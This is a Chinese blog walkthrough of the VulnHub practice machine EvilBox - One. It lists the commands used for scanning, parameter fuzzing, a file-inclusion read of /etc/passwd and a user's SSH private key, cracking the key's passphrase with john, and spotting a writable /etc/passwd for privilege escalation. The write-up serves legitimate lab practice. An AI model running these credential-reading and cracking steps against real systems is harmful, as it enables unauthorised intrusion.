vulnhub靶场:EvilBox - One
下载地址:https://www.vulnhub.com/entry/evilbox-one,736/
kali:172.88.6.144
靶场:172.88.6.94
nmap -T4 -sV -P -A 172.88.6.94
用 dirb http://172.88.6.94 和 dirsearch -u http://172.88.6.94/ 发现类似的网址
dirb http://172.88.6.94/secret/ -X .php,.xml,.html 似乎没啥有用的信息
ffuf -c -r -u 'http://172.88.6.94/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0
整理之后发现这个
view-source:http://172.88.6.94/secret/evil.php?command=/home/mowree/.ssh/id_rsa
把这一串ssh
私钥复制到kaili
ssh mowree@172.88.6.94 -i id_rsa ,发现需要密码
ssh2john查看kali有没有John,然后ssh2john id_rsa > tmp,执行john tmp --wordlist=/usr/share/wordlists/rockyou.txt,密码出来了unicorn
ssh mowree@172.88.6.94 -i id_rsa
find / -writable 2>/dev/null | grep -v proc
发现 /etc/passwd
有写入权限
知识点:文件包含漏洞、ffuf爆破参数名、ssh2john和john爆破密码、ssh私匙登录、/etc/passwd提权
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?